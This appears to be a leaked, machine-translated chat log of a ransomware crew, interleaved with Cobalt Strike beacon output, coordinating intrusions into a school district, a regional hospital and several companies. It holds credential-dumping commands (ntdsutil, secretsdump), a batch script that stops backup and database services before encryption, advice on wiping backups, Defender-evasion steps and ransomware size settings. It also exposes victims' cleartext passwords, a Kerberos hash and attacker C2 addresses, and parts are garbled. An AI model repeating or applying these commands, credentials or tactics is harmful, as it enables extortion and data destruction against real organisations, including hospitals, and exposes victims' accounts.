CurrentTimeUtc : 21-09-2020 09:38:52 (Local time: 21-09-2020 15:08:52) TimeZone : India Standard Time TimeZoneOffset : 05:30:00 InputLanguage : English (India) InstalledInputLanguages : English (India), Unknown layout MachineGuid : e2c815c9-b79d-4a27-bc08-6c917f3ab98d ``` ``` ====== InstalledProducts ====== Adobe Flash Player 10 Plugin 10.2.153.1 Adobe Shockwave Player 12.1 12.1.3.153 CVSNT 2.0.51 WinCvs 2.0 Google Chrome 85.0.4183.102 Microsoft Edge 85.0.564.51 Microsoft Edge Update 1.3.135.29 TeamViewer 15.3.8497 TotalCSVConverter Intel(R) Wireless Bluetooth(R) 20.60.1 DcuMSMWrap 5.0.03 Microsoft Visual C++ 2013 Redistributable (x64) 12.0.30501.0 Realtek USB Audio 6.3.9600.2202 Python 3.7.3 Tcl/Tk Support (32-bit) 3.7.3150.0 DFUDriverSetupX64Setup 6.6.1939.0 Python 3.7.3 Documentation (32-bit) 3.7.3150.0 Thunderbolt™ Software 17.4.79.510 Python 3.7.3 Core Interpreter (32-bit) 3.7.3150.0 Skype for Business Web App Plug-in 15.8.20020.400 Microsoft VC++ redistributables repacked. 12.0.0.0 Java Auto Updater 2.8.71.15 MySQL Installer - Community 1.4.29.0 Python 3.7.3 Development Libraries (32-bit) 3.7.3150.0 Intel(R) Chipset Device Software 10.1.17541.8066 ManageEngine Analytics Plus 1.0 Google Update Helper 1.3.35.451 swMSM 12.0.0.1 ManageEngine 10.0.518.W ZVoice - Desktop 1.1.9 Mozilla Firefox 79.0 (x64 en-US) PuTTY release 0.74 (64-bit) Mercurial 3.8.1 (x64) FortiClient VPN 6.2.0.0780 LibreOffice 6.2.4.2 6.2.4.2 MySQL Server 5.7 5.7.26 ``SeatBelt all``. beacon> shell net localgroup "Administrators" [*] Tasked beacon to run: net localgroup "Administrators" [+] host called home, sent: 62 bytes [+] received output: Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator sysadmin ZOHOCORP\raja-9298 The command completed successfully. 
`````` beacon> shell nslookup [*] Tasked beacon to run: nslookup [+] host called home, sent: 39 bytes [+] received output: Default Server: UnKnown Address: 192.168.100.30 ``` Domain : csez.zohocorpin.com ``You got the session? user4til tomorrow.1.done.gaudyme.comTill tomorrow by 7.00, the rest of the sessions are in the slipstream then```. servers: in hell: 2 actual: 1 alive: 1 pulled: 5 armas: per hell: 30 alive: 5 drawn: 5 encrypted: everything ``and that's it, then the status for the tick and in the other folders then we'll leave it to the dk2 sessions left to be pinged`` beacon> shell ping 172.16.1.247 -n 1 [*] Tasked beacon to run: ping 172.16.1.247 -n 1 [+] host called home, sent: 53 bytes [+] received output: Pinging 172.16.1.247 with 32 bytes of data: Reply from 172.16.1.15: Destination host unreachable. Ping statistics for 172.16.1.247: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), beacon> shell ping 172.16.1.83 -n 1 [*] Tasked beacon to run: ping 172.16.1.83 -n 1 [+] host called home, sent: 52 bytes [+] received output: Pinging 172.16.1.83 with 32 bytes of data: Reply from 172.16.1.15: Destination host unreachable. Ping statistics for 172.16.1.83: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), beacon> shell ping 172.16.1.61 -n 1 [*] Tasked beacon to run: ping 172.16.1.61 -n 1 [+] host called home, sent: 52 bytes [+] received output: Pinging 172.16.1.61 with 32 bytes of data: Reply from 172.16.1.15: Destination host unreachable. Ping statistics for 172.16.1.61: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Finance, accounting, corporate files are encrypted Disconnect the other avs and that's all it worked Check the folders)) have deleted How did you disconnect then? on the dk yes but there's no control console. it looks like it's in the cloud) shut down the avs? 
spread on the dk readme.txt finished with the servers sorting serversoksort servers and so on the old scheme all the same hash krbrst userno just in case throw here hash not the fact that there all passwords So if there are passwords, what's the point of hashes?in cleartext as it is clear cleartext passwords)there all hashes.ptsdlt.ptsdlt not ready work)ready work in forms? type echo 1 > 1.htmlcreate there a file 1.htm with the text 1happens to the truth there is no iisstart.htmsearch there index fileadaThis path on the disk you mean? i mean in intpub is wwwroot?there is a wwwroot there will be a folder inetpub or something like that check the C:\direct in forms or ftp in C:\Windows\system32\inetsrv\Config` no configs what about configs and so on let's deal with forms.decoder ntsy you run the extract secretsdump.py -ntds ntds.dit -system SYSTEM -outputfile result local Put all files in one folder, there will be 4 of them together with the script. pip pip install impacket pip install pycrypto pip install pyasn1 apt-get install python-dev ``no config on the ftp in ``C:\Windows\system32\inetsrv\Confighow much archive did you get? it's too bighow to upload here `sendspace.com` click here and password me first into the archive under the password and upload here it is downloaded. and where do you want to upload it?where is the physical path on the disk look at the configs and on both winndef, as i understand on the fpt simantecki other check the processesedrforms.sisd.net pulled in the same way as the external one. check these 3 mail.sisd.net 40.101.49.66 Sign in to Outlook autodiscover.sisd.net 52.97.133.216 Sign in to Outlook forms.sisd.net 216.171.94.67 Windows Microsoft-IIS 10.0 ASP.NET IIS Windows Server ``mail.sisd.net only external ftp yes, I get it. we will put them zakrepy? and communication with the internal server as you can see they have ftp. subdomains that have external ipey sent you a scan of subdomains from their external main domain> what to scan? 
or again I do not understand? sub domains then do not understand, what does scan sub domains?the dlls are not knocked out now let's play with this and do another option zakrepaetsya and we are interested nunu external What does it mean white ips?) check edtax on these dns with the main yes subs only these? yes. is there a session available for manipulation? local 10.0.51.253sub>> scan the subs www.sisd.net 13.35.193.39 Windows Microsoft-IIS 8.5 ASP.NET 4.0.30319 Socorro Independent School District / Homepage mail.sisd.net 40.101.49.66 Sign in to Outlook autodiscover.sisd.net 52.97.133.216 Sign in to Outlook sip.sisd.net 52.112.193.13 RTC 7.0 my.sisd.net 216.171.94.39 Apache PHP my.sisd.net Log-in portal.sisd.net 216.171.94.44 forms.sisd.net 216.171.94.67 Windows Microsoft-IIS 10.0 ASP.NET IIS Windows Server survey.sisd.net 216.171.94.93 archive.sisd.net 216.171.94.95 www2.sisd.net 216.171.94.96 Windows Microsoft-IIS 10.0 IIS Windows Server ftp.sisd.net 216.171.94.101 Windows Microsoft-IIS 8.5 ASP.NET IIS Windows Server support.sisd.net 216.171.94.102 Apache Socorro Independent School District connect.sisd.net 216.171.94.133 Apache Connect SISD ``I'll take the hashes and put them into a confu-file, upload it to a file-sharing site and send me the local ip or the external one will be lit pinging from inside the domain ftp.sisd.net ``you have yes, trying to download ptdr.net`` see hp5 min can already be installed, take the ntds and while under this account and look for 2 quiet godforsaken servers without avs and other stuff.``you have it yes? account from kerba you already account yes? ok. wait for the speed, unlike cobalt, there is no speed limit, better via armitage about 8-10 hours just a long time will be pumping Listen, and koba 637 meters download? 
and that's how long it all, maybe it does not download, and I'm waiting...okshnyal, downloaded, made myself a token yes and jumped away to the silent servers I will issue a fast do nashuyuchit muchesnimi just in case it looks like yes you probably stopped the service during execution now can pick up filesvot it seems true ```. ntdsutil: ac in ntds Active instance set to "ntds". ntdsutil: ifm ifm: cr fu c:\windows\temp\ntds Creating snapshot... Snapshot set {feb986c1-384e-4798-8a98-320359ac7bf8} generated successfully. Snapshot {d21d04b5-cff8-4f62-a308-9318ca9ae6d9} mounted as C:\$SNAP_202012020302_VOLUMEC$\ Snapshot {d21d04b5-cff8-4f62-a308-9318ca9ae6d9} is already mounted. Initiating DEFRAGMENTATION mode... Source Database: C:\$SNAP_202012020302_VOLUMEC$\Windows\NTDS\ntds.dit Target Database: c:\windows\temp\ntds\Active Directory\ntds.dit Defragmentation Status (% complete) 0 10 20 30 40 50 60 70 80 90 100 |----|----|----|----|----|----|----|----|----|----| ................................................... Copying registry files... Copying c:\windows\temp\ntds\registry\SYSTEM Copying c:\windows\temp\ntds\registry\SECURITY error 0x800706ba(The RPC server is unavailable.) error 0x800706ba(The RPC server is unavailable.) error 0x800706ba(The RPC server is unavailable.) IFM media created successfully in c:\windows\temp\ntds ifm: q ntdsutil: q It will directly say 100 it will write when it makes a full backup, wait, it says something else...ndsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\ntds" q q give the bicon output after it worked outda two folders and one has two files in itwas output after it worked out ntdsutil?vss service stopped I want to compress ndts.dit `c:\windows\temp\ntds\Active Directory\ntds.dit : The process cannot access the file because it is being used by another process. 
`oki I'll throw in two pins and wait for ntdsda I noticed) that's what long interruptions do) well there's one in the forum sc query vss sc start vss ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\ntds" q q sc stop vss If not then in both places do you make notes right now on the forum and in your personal notes no info?) remind me how, because we only tried once, I think, and that did not work) take it off via ptdstuidler no `` [+] Determining what EDR products are installed on localhost... [+] host called home, sent: 57 bytes [+] No EDR products found! Operate at your own risk! ``I'm on dk pod token c$ balloon vindo on dk? yes, to the server jumped valid? dcsync for some reason for 20 sec hesitates and does not return anything. What would that mean? $krb5tgs$23$*sccmadmin$admin.sisd.k12$MSSQLSvc/SCCM-SQL.admin.sisd.k12 juliet25- ``So, let me give you access to 2 domains at once one. @user7 there are 2 more people on the way to where the second?)and where is the other half?)helloHiHiHiVi never keep more than 10-15 active sessionsokwhen you need to do related work in 4.1client do not deleteadam 4.2 go to finally? +okay, then all have 4.2 cleaneno 4.2 I also haveona 4.1 in my kobe yesterday closed gofer?:heavy_plus_sign:+ everybody have coba 4.2?:heavy_plus_sign:+++tasks are clear to all? hello there:space_invader:add me to my colleagues in the confabs let's write from one dude to another about pass from nimbla[ ](https://mediaeveryone.com/channel/general?msg=a7bE4sNqbM6uRkvJG) flows against the current[ ](https://mediaeveryone.com/channel/general?msg=3YDeQbYx3iq2NzQik) what? in water is unusual scheme we close two networks at once? there's a couple of people in the water who are neurotic, they go to these nimbles, but they don't save their passwords anywhere. once again on the computers/servers went through\to the browsers files with passwords and what were you doing? how are you getting on? 
google help) is this something that already exists, or do you have to do? which can overwrite a network drive a few times console fileshredder and more? to overwrite backups if it doesn't encrypt go to ssh and rm -rf -prepare more filehredder today I'll try over the garbage if lin will allow. it's pretty neutered there or check their disks all? we've been mashing them and mashing them and mashing them and mashing them and mashing them and mashing them and mashing them. we still haven't updated to 10 to all esx? We have to look at the confab first, clarify what lin systems are there? there is a skul, there is mail (one), there are listings and files, there is access to esx all or not all at #rtpcompany-com more precisely say without like in #rtpcompany-com *almost* everything is ready in #waterway-com the skool is rolled out, there's a problem with the mail, there's a problem with backups Backups on the mega have not gone Backups are trying to take off no 445 anywhere, only backups are visible on the nasa for now How is the work progressing? hi all hello thereafter, we are trying to remove the backups from the mega in the water, let it pour in the mega in the water, and do not confuse which one or what and the mega we leave in the water in the slip It turns out that piripezd sometimes in the mouth cleaner even miss think only water then oka da it missklik in the water now. you misinform me in rt all yes only water and rt and water while loading? no in rt all unloaded? would not want to leave the mega there it's all very interesting, but can we wrap it up already today? I'm sleepy. Everything's ready for the rtp.
i've got everything on the water except for the backups, i'll have until 3 tomorrow just to deal with it Tiny whisper BDSM it's the windup's job to suffer So let it stay like that) Good for you too generous rating "Fragile" It's not fragile, it's just fucked up. It's better for everything but dota and pbna. Fuck the windup. of course fuck it, you can see how fragile it is) maybe. i don't even know why it's allowed for rdp maybe it's because it's a "remote" service if you could do that there'd be a lot of conflicts Fuck the windup... but it's the windup... i know it's stupid... it's vinda Kuryu i understand that you're googling now, well when you finish googling please tell me what you found in the repository of knowledge it's a fixed protocol, not a service that you can deploy anywhere else all the rest is forward on nix - you could on vinda) seriously?) you will ALWAYS have reception on the smb on 2 ports read the documentation) Googling))) not changing the port is portfwd It is possible to configure port mapping on the nasa Everything can be changed read the documentation)) is a medal the last two messages - on bash.org unequivocally and no matter what it will not work everything can be changed I'm not even fucking sure that it changes in the wind in general) ok not change the port in AD and then guess which one is smb which is the rdp how will it work without smb? for example diskshare... psezek? but what's that to us dastmik also does not work now the cards will point the way no idea, it's too complicated this time which rdb which of them smb to guess potomotnite 1 to 65535) mb port have changed thoughts on the subject? these remained + tok with the backups listings left in the water can not remove because there is no rdp or smb ports loaded on the megutak what do you have? yes it ssh ?
root:glp151yQA92Abu7WIAYw@23.106.160.212:35985 this is ssh in half an hour and will be taken down soon, guys, anyone with anything important left in their tpsh take it away, it will crash the next time they try to network locate as soon as the file locating process starts it will get a flag hanging on it right away no it does not conflict with each other? if from two servers, conditionally, will come to 1 arm where 1 has already started the process but if it's everywhere off then why not? it will work if you turn off the Aver by itself it's possible to do so for example from a SYSVOL balloon which is available by default to all machines domain edr can it kill? and maybe add to the batter, that at the end it would download the locker from some balloon and run? it does not conflict with each other? if two servers, so to speak, will come to 1 arm where 1 has already started the process run it without arguments and the locker will start scanning the network for available balls as it finishes locking "in itself" on the machine as you can see it slows down services and kills peeps who can hold handls + shares drives

```
"C:\Windows\system32\net1 stop \"samss\" /y"
"C:\Windows\system32\net1 stop \""veeamcatalogsvc\"" /y"
"C:\Windows\system32\net1 stop \""veeamcloudsvc\"" /y"
"C:\Windows\system32\net1 stop \""veeamdeploysvc\"" /y"
"C:\Windows\System32\net.exe\" stop \""samss\""/y"
"C:\Windows\System32\net.exe\" stop \""veeamcatalogsvc\"" /y"
"C:\Windows\System32\net.exe\" stop \""veeamcloudsvc\"" /y"
"C:\Windows\System32\net.exe\" stop \""veeamdeploysvc\"" /y"
"C:\Windows\System32\taskkill.exe\" /IM sqlbrowser.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM sqlceip.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM sqlservr.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM sqlwriter.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.agent.configurationservice.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.brokerservice.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.catalogdataservice.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.cloudservice.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.externalinfrastructure.dbprovider.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.manager.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.mountservice.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.service.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.uiserver.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.wmiserver.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeamdeploymentsvc.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeamfilesysvsssvc.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.guest.interaction.proxy.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeamnfssvc.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeamtransportsvc.exe /F"
"C:\Windows\system32\taskmgr.exe\"" /4"
"C:\Windows\system32\wbem\wmiprvse.exe -Embedding"
"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"
"icacls \""C:\*\" /grant Everyone:F /T /C /Q"
"icacls \""D:\*\"" /grant Everyone:F /T /C /Q"
```

This is an example of "prelok" batnick let's hope they won't eat it)) he has some kind of toolkit there or is it shellconcat too? in this network semantics is vicious while his loads work da, does the new coba come already?

```
172.241.27.18 https://agesk.com
----------------------------------------------------------------------------------------
209.222.97.8:62460 TnRLaHoRRRwyezbn6ybP1ed1xRlhtnAQAM5o
```

Let's keep looking for access to the population parral'naya guys uchut access to nas +1 obuschem how to get into trusts in #wilsonart-com :space_invader: who do what? hello Thank you guys, please throw sharkhromium build can certainly login with rockyu let ... what other exploits can try under ftp?
anonomus and login with passwords you found does not work

```
[-] 10.103.1.108:445 - Host does NOT appear vulnerable.
```

```
10.103.1.108:445 (platform: 500 version: 6.1 name: BL19 domain: ORANGE_FACT)
10.250.1.41:445 (platform: 500 version: 6.3 name: CFD01 domain: ORANGE_FACT)
10.109.1.21:445 (platform: 500 version: 6.3 name: TL02 domain: ORANGE_FACT)
10.100.20.15:445 (platform: 500 version: 6.3 name: OC40 domain: ORANGE_FACT)
```

user8 add @user8 to the chat room I'm the only one here now) can I have slypad.com:443 who pass? there is a session, most likely goes to `CORPSFEAPP05` as will be turned on the VPN check the `CORP.TELEVISA.COM.MX\cguerrerobo Televisa *2020` did not have time to check the cress, turned off the VPN-as the other mount, which I did on the server does not roll?
or he never came + putzakrepreshit hangs yes Byla would not miss the sparrows. I confused with balya stopya see in the cob session from there hangs a why bother me and the extra light zakrepnu tell me that There is no time, valenok at the computer includes vpn for a couple of minutes. As soon as we jump I'll report a only 1 perekiruyte on the server somewhere Pulni plz oda Zakrep weighs? -little if @tl2 @tl1 and at least some hashik unloaded ? VPN enabled for a short time. Here progress is not great, looking for an accessible server that would hook up, unloaded Firefox now will look at the deadic, maybe some accesses will find #sccy-com #ballymoregroup-com and something else I had nothing to do with what's in the works today? I'll keep you posted on how it will go from here. no, most of the servers are off, those that are not - encrypted network did not rollback? hi) hi, check the old network? no, what the hell have you changed in the settings, and I have not collected again. probably because of the vpn, later check it, strange, I'm quiet.

```
{ "bit": "64", "core": "shellStarter_llvm.dll", "flags": "self" }
```

https://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion CreepingDeath 2e30528eeafa9152666b89fabd9ac914 npsps

```
23.81.246.16 https://hdavail.com
----------------------------------------------------------------------------------------
64.187.238.58:27616 3vj63jL9oSHB4nYYg0e2C44AapdZ095IsFS
```

At a glance, you're talking about... stalin and user8 are working in it now who took it? water what's it got to do with it? is it dead or did someone else take it under water or where? under work what exactly? can you be more specific? under work... nothing is flying in mine under what? the date you used yesterday? yes there are clean kobs? from deadick is drawn, but otherwise no no ? i'm intrigued...
And the hour has passed already No flying sessions did not help This time we'll all get together on a small bering about the next week but in general they may not need sooner nae anything) on zakrepov .... a zakrepov? + updated the files in tulsa, there Detect 4/23 on the dynamics instead of 9/23 started in these two ways regsvr32 file.dll rundll32 file.dll, StartW Disassemble I have all x64? ok, 4 then, it's better to have in reserve in tv as well but just in case it's your only chance to clean the load 2 shellcoats that's it? i'll give you a couple more vpn's in work 2 pcs? all? send me a shellcoat i'll give it as an archive but i can clean it by hand at least by tulsam, dudes come by, but computers are not domain so it's hard to get there. i have dumped hashes tl2, maybe when will unload ... on sccy silence? i have a TV and user7 helps sccy in pcsb we troetools cleaned? 1 with tv and 1 with pcsb? the same as yesterday) who's working with what today? :space_invader: hello We're all goodbye to 6x by tomorrow Let's get the horses) user1 poca off, alas there kerbs, you'll be swathed and the farm is still off? add @user1 otleetla more i did not take any unwanted action last 15 minutes before i died on ms17-010 empty

```
beacon> shell net localgroup administrators
[*] Tasked beacon to run: net localgroup administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members
-------------------------------------------------------------------------------
Administrator
dennadmin
dennisadmin
localadmin
ORENCO\Domain Admins
The command completed successfully.

beacon> shell net group "Domain admins" /dom
[*] Tasked beacon to run: net group "Domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain orenco.com.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members
-------------------------------------------------------------------------------
0renco  ADadmin  ADAM_OrencoAD-LDS  ADCS-CertSvc  ADCS-NDESSvc  ADCS-WebSvc
bdehaven  bmehrabian  esherman  ExchangeAdmin  hodges  JLyons
jperez  mark.dupuis  SCCM01$  sdawson
The command completed successfully.

beacon> shell net group "Enterprise admins" /dom
[*] Tasked beacon to run: net group "Enterprise admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain orenco.com.

Group name     Enterprise Admins
Comment        Designated administrators of the enterprise

Members
-------------------------------------------------------------------------------
095  bmehrabian  ExchangeAdmin  hodges
The command completed successfully.
```

tl2 otuser9 mails, fs, socials look more and you looked at the tech guys all? brutal did not give anything (brutalized esx looking for web faces the ability to rub the backups there is movement? - @tl1 have you encountered this? took a screenshot of the admin desktop there was an etp console open, he was just restoring No credits. He stole a cookie and then he logged in. 10.1.0.170 because they go by ip https://10.1.0.170/web/bin/index.html and only one user tell me where you find it now how did you see it?) there is another backup system Rubrik not cloudy not a clue here ... you need to automatically generate all combinations with pass and cvr+special characters, the guy has passwords like - pass123 pass123@ passl23# and so on random password generator? you ask about a password manager? What's a tool that generates passwords based on a pattern i checked, but i couldn't find them. look at the sphere ... you did a scan of the network how did you find them? ie fucked up only in esx? what do you mean completely?
i see there fs and everything is shifty there is available? if not you are wasting your time is vim server available?

https://github.com/Arvanaghi/SessionGopher

```
* Username : rthomas
* Domain   : MAIN
* Password : !@monstrosity2002
```

2 what part was it? no, these are not in adiz* of them? didn't understand the question, for them? some part for them? some in the domain were they in the domain? yes? forgot them?)

1.done.CRISPREGIONAL.ORG thank you bbbb ok))) you go to 12 you can go satii togo +4 hours on top of everything zbs aga Same went after the 1742 gb jammed what did you do? the process went faster 1742 gb or through ehei and then try to limit the size and run separately to the folder again check av and vindef monitor this case but in 3 hours I'm trying to get on the rdp to the server from which you can go to the admin, 500gb file has changed the extension of what? kobadai access to the coba still check the aver to start Parameter in the argument?? inject, with the
parameter E:\ -size 25 and then put dll again on the backpack admin maqafi suddenly turned on and before that the exe was ok? processes hangs on? see the maqafa a what is it? it is demolished start it throw the exe

```
beacon> shell dir C:\
[*] Tasked beacon to run: dir C:\
[+] host called home, sent: 38 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is 88D0-688E

 Directory of C:\

01/22/2021  01:06 AM             1,558 .rnd.YHCWU
01/22/2021  01:06 AM             1,790 Dailly Backup_Subplan_1_20160715120154.txt.id-B4E852BA.[emailme@italymail.com].arena.YHCWU
01/22/2021  01:06 AM            14,885 eula_en.txt.YHCWU
12/30/2015  08:47 AM                66 install x64.bat
01/22/2021  01:06 AM            10,815 legal_notices.txt.txt.YHCWU
08/22/2013  10:52 AM                   PerfLogs
01/22/2021  01:07 AM                   Program Files
01/22/2021  01:07 AM                   Program Files (x86)
01/22/2021  01:06 AM             3,194 RakhniDecryptor.1.21.2.1_15.10.2017_23.13.34_log.txt.YHCWU
10/15/2017  10:13 PM         5,463,192 RakhniDecryptor.exe
01/22/2021  01:06 AM               930 readme.txt
01/22/2021  01:07 AM                   Users
01/22/2021  01:07 AM                   VBRCatalog
01/22/2021  01:07 AM                   VeeamBackup&Replication_9.5.0.1038.Update2
01/22/2021  01:07:07 AM    679,073,953 VeeamBackup&Replication_9.5.0.1038.Update2.zip.YHCWU
01/22/2021  01:07 AM     2,158,762,518 VeeamBackup&Replication_9.5.0.823.Update1.iso.YHCWU
01/22/2021  01:07 AM                   VeeamFLR
01/22/2021  01:07 AM             1,913 veeam_backup_perpetual_32_0.lic.YHCWU
01/21/2021  11:26 PM                   Windows
01/22/2021  01:07 AM            10,576 zabbix_agentd.conf.YHCWU
01/22/2021  01:07 AM           664,700 zabbix_agentd.log.YHCWU
01/22/2021  01:07 AM                   Zabbix_x64
              13 File(s)  2,844,010,090 bytes
               9 Dir(s)  20,071,145,472 bytes free
```

or the exe file in the root of the drive dll i look at the root of the disk I can't answer you this srevak did user9 and all conversations will be about this server here? Where did you run the exe file? fuck + from here the 500gb file has changed its extension?
```
[*] Tasked beacon to run: dir E:\
[+] host called home, sent: 38 bytes
[+] received output:
 Volume in drive E is Backups
 Volume Serial Number is 1AB1-05F7

 Directory of E:\

01/22/2021  02:37 AM                   American HealthTech
01/22/2021  02:41 AM                   Cobian
01/22/2021  03:01 AM                   Corepoint
01/22/2021  03:01 AM                   Corepoint DB Cluster
01/22/2021  03:01 AM                   Deleted 3M CDIS Old
01/19/20/2021  08:42 PM                Deleted Allscripts Pro
01/21/2021  01:01 PM                   Deleted FollowMyHealth
12/30/2020  02:46 PM                   Deleted IPS Servers
01/21/2021  12:05 PM                   Deleted Meditech MU Servers
01/21/2021  01:03 PM                   Deleted Meditech OlahPDFViewer
12/30/2020  02:24 PM                   Deleted Meditech Servers
12/30/2020  03:16 PM                   Deleted Old vCenter Servers
12/30/2020  01:42 PM                   Deleted Redoc
12/30/2020  03:29 PM                   IPeople Servers
10/15/2019  07:10 AM                   IT Infrastructure Servers
12/30/2020  12:36 PM                   Kronos
10/15/2019  08:14 AM                   Meditech Server Snapshots - 1 Time
05/12/2020  01:27 PM                   ProgramData
08/05/2018  09:07 PM                   Provation
01/22/2021  01:06 AM               930 readme.txt
05/15/2020  09:01 PM                   VeeamAgentUser6940465c-6f53-11e8-9c43-bc0000e00000
10/06/2016  09:00 AM                   VeeamConfigBackup
               1 File(s)            930 bytes
              21 Dir(s)  5,198,023,389,184 bytes free
```

I'm interested in its total say and free space day dir E:\ Pure bullshit! But there is clearly more said 30 min = 1tb realistically a long time so, you have backups on the wine server and there you have a session? I do not understand you, I am on this PC) Where do I take it? Ie you also ran the build there? disk with backups attached or not

```
beacon> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.

There are no entries in the list.
```

It shows the attached disks see if there is no 2 TB Voz can be attached somewhere, I did not do it. The disk is attached? how much is the total size occupied? It goes to a small size there is movement? if not, let's run with -size25 or stands in place there is movement on the files?
-size[10/15/20/25/30/35/40/45/50/60/70/80] This parameter defines how much % of the file will be encrypted (by default 50%), the file is encrypted in different places in chunks. In this case, the database is encrypted at 100%, the files in the vm at 20% regardless of the value of the parameter. there close and all day Saturday bye) and Saturday will be finished tomorrow at work time #ballymoregroup-com weekend is the ssk?) but the weekend will be free max at 9 can be later? sleep 6 hours then the rest home I stay as late and 8 + H for those who stay 8 for everyone today? how late? so who stays tonight? so whoever stays tonight will just call to check, there's no need for everyone to stay home the rest can go home the main thing is that the syntax is correct yes, with that, but I think it should work faster with 15 let's brainstorm) you run it yourself then I've run it with "-size 15 e:\" from the neighbor's one is the syntax correct? no files are not changed? does it still have 500gb files on the first folder? is there a live process hanging? are the folders not fully encrypted? to gpd 20-2000gb files and in these folders less than half of the files half of the folders are only small files so far on the second passed 1 disk how many files passed on the backups? das logonscripts finished? on wine servers for example cut off) just then the point of cutting it) and polozak throwing out? i just see that gpupdate is still hanging on the user it means he did not accept the update and windef is still on if you force it within 5 minutes to ask about windef it's not like it's turned off or something.
when you force a gpapdate, it gives the user an alert that the update is applied after it will exit 8 tb had to wait for backups there are 160 servers in hell alive 99 closed 99 1,550 armies by hell 479 alive we unshared the disks, unshared the exe, put it in the logon copy and start exe the center\nasys have been wiped out backups in progress

```
NOVANET
```

```
TRINISYSQA-DB
RINISYSQA-APP
```

Then we're ready to run it? Tell me when you're ready Don't run it yet Unfollow processes\kill processes, just run it rub one nasa what's left? have you got many left? have you not started yet?

```
CRANEWARE
NTOPng
OMNICELLOld2
```

```
itunitynas.main.crispregional.org
```

NAS zamakat \backup,

did not attract

In that case you format it if they are files of the current machine then do not delete only snapps Do you have virtual machine disks are files?
```
https://crhsvcenter7.main.crispregional.org/ui/ Administrator@main.crispregional.org cr1spy173
```

don't forget to drop the process of whining on the servers, etc @user9 coordinate on the network n hope vindef not cut, let's so can prescribe in the logon script kst ports 7/9 are also closed everywhere, it seems standard for vol (D)*FY&(GSDGUVIIYSDOF*^RS*GUTSBG (wakemeonlan not see switched off compounds, but it also falls off the problem is that the jump generates an echo and we have no signature certificates in cobalt may react to it and the old one was not there and the old one was deleted? if anything, EXACTLY the script was imported) on the rdp I sit where the jump did not see the note fna jump burned but defender should not stalid ... did not steam today at least not yet) aha seriously?
should be cleaner everything is very relative defender steam it) how long does it take for you to reach the jmp?) it works?

> * Beacon's 'jump psexec' and 'jump psexec64' commands

yes) or it generates loads itself when you jump and so? it? yes? how to generate? everything? lol)) you have to start a new one lol) no, you have to start a new cobalt and not take a script from it and add it to the old one? you have to add it to the script manager and you can't use it? @user9 because you start it with the old startup, not through the hooke me ok In the package in the folder Cobalt42_v2/Toolkits/artifact/brooks-artifact-kit/ is artifact.cna which must be imported into cobalt to generate internal native loads and staged loads to run. Booted so I wrote 15 = 0 da and 13 ok just 13 is not as easy to install as 15 (S)*YD(F&T*^SDUYGfDSI&%FUHIG^7 if 15 is bullshit) yes 15 jdk13 installing the right Java:

```
sudo add-apt-repository ppa:linuxuprising/java
sudo apt install oracle-java15-installer
java -version
java version "15.0.1" 2020-10-20
Java(TM) SE Runtime Environment (build 15.0.1+9-18)
Java HotSpot(TM) 64-Bit Server VM (build 15.0.1+9-18, mixed mode, sharing)
```

Upgrade only from Java 13, not so fast we'll unpack your flesh, give us your clean and pristine, so upgrade

```
206.221.188.106:63254 edbDkh6n9sCjfeYJLyFby0q5tKCzuscVSnj
```

```
206.221.188.106
```

any coba creeds left? can't find it any cleaner than our dlls from tulspanel.
Artifact Kit is used in the following cases:

* Attacks -> Packages -> Windows Executable
* Attacks -> Packages -> Windows Executable (S)
* Attacks -> Web Drive-by -> Scripted Web Delivery (bitsadmin and exe)
* Beacon's 'elevate svc-exe' command
* Beacon's 'jump psexec' and 'jump psexec64' commands

it's artifact kit ego windef not trett e now you can go through jump) what do you mean it cleans? are we going to do it now? we have a coba update that cleans jump and also coba here to work start with servers, dk last but not least @all pull all servers here anyway it's about ARM If you drop AV then so you can turn off windef and unpack exe then work nope no idea but it looks like we'll find it disconnect the policy and form did not find? at least one of the monitors stand you two next to each other will sit in the same window or what? ok @user7 help with AV and we will close only some policies are not available, i tried under different admins just unplug it? in the policies, there are a million of them found? look for disconnect but do not disable then all ok + in other folders machine with the tag server 144 in the folder servers 100+ should clearly see how many servers there at least approximately or type of server a what filters do you need? look filters you went there or screenshots? how many I do not see, but I see that a lot, most likely all at least all servers and give me a shellcode are all pk's running there? no, i think all of them) here's a freshly built dll then + and there processes die in 30 sec? not all servers i checked, where i looked - they knock in it-admin, this server is macaffi cloud? and where they knock? yes everywhere is macaffi, just somewhere direct client and where some 